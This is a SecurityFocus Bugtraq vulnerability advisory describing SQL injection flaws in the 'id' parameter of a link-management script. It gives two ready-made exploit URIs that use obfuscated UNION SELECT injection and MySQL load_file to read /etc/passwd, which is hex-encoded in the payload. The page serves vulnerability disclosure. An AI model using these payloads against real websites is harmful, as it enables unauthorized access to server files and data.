Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Kostenloses Linkmanagementscript 'id' Parameter Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/[patch]/view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*
http://www.example.com/[patch]/top_view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*







 

Privacy Statement
Copyright 2009, SecurityFocus